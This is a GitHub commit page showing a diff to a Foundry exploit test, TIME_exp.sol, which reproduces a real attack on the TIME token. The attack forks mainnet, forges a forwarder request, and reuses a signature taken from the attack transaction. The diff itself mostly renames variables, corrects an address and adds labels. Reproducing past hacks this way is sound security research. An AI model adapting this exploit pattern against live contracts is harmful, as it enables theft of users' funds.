Skip to content

Commit

Permalink
Merge pull request SunWeb3Sec#495 from Kkaminsk86/main
Browse files Browse the repository at this point in the history 
Update TIME exp
  • Loading branch information
@SunWeb3Sec
SunWeb3Sec authored Dec 8, 2023
2 parents baf174f + fc1f484 commit 03700c3
Showing 1 changed file with 11 additions and 5 deletions.
16 changes: 11 additions & 5 deletions src/test/TIME_exp.sol
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ import "./interface.sol";
// @KeyInfo - Total Lost : ~84.59 ETH
// Attacker : https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a
// Attack Contract : https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0
// Vulnerable Contract : https://etherscan.io/address/0xc82bbe41f2cf04e3a8efa18f7032bdd7f6d98a81
// Vulnerable Contract : https://etherscan.io/address/0x4b0e9a7da8bab813efae92a6651019b8bd6c0a29
// Attack Tx : https://explorer.phalcon.xyz/tx/eth/0xecdd111a60debfadc6533de30fb7f55dc5ceed01dfadd30e4a7ebdb416d2f6b6

// @Analysis
Expand Down Expand Up @@ -48,11 +48,17 @@ contract ContractTest is Test {
Uni_Router_V2(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
IForwarder private constant Forwarder =
IForwarder(0xc82BbE41f2cF04e3a8efA18F7032BDD7f6d98a81);
address private constant victimAddress =
address private constant recoverAddr =
0xa16A5F37774309710711a8B4E83b068306b21724;

function setUp() public {
vm.createSelectFork("mainnet", 18730462);
vm.label(address(TIME), "TIME");
vm.label(address(WETH), "WETH");
vm.label(address(TIME_WETH), "TIME_WETH");
vm.label(address(Router), "Router");
vm.label(address(Forwarder), "Forwarder");
vm.label(recoverAddr, "recoverAddr");
}

function testExploit() public {
Expand Down Expand Up @@ -80,7 +86,7 @@ contract ContractTest is Test {
);

IForwarder.ForwardRequest memory request = IForwarder.ForwardRequest({
from: victimAddress,
from: recoverAddr,
to: address(TIME),
value: 0,
gas: 5e6,
Expand All @@ -89,11 +95,11 @@ contract ContractTest is Test {
});

// Using signature from attack tx
bytes32 sigHash = 0x2038560f9bee81aecd0fa852fae43c9e2a4db94c609c3b91dba5ac0f01b4d5c6;
bytes32 messageHash = 0x2038560f9bee81aecd0fa852fae43c9e2a4db94c609c3b91dba5ac0f01b4d5c6;
bytes32 r = 0x9194983a3dbfb5779c09c95f5d830d8435d9ce88b383752c3dfb8a1b84b8c9f5;
bytes32 s = 0x11b7c750f1334e2f26ca9be32c2d070a4a023edf745b02468d6cba9a15a494c6;
uint8 v = 27;
assertEq(ecrecover(sigHash, v, r, s), victimAddress);
assertEq(ecrecover(messageHash, v, r, s), recoverAddr);
bytes memory signature = abi.encodePacked(r, s, v);

// Start exploit here
Expand Down

0 comments on commit 03700c3

Please sign in to comment.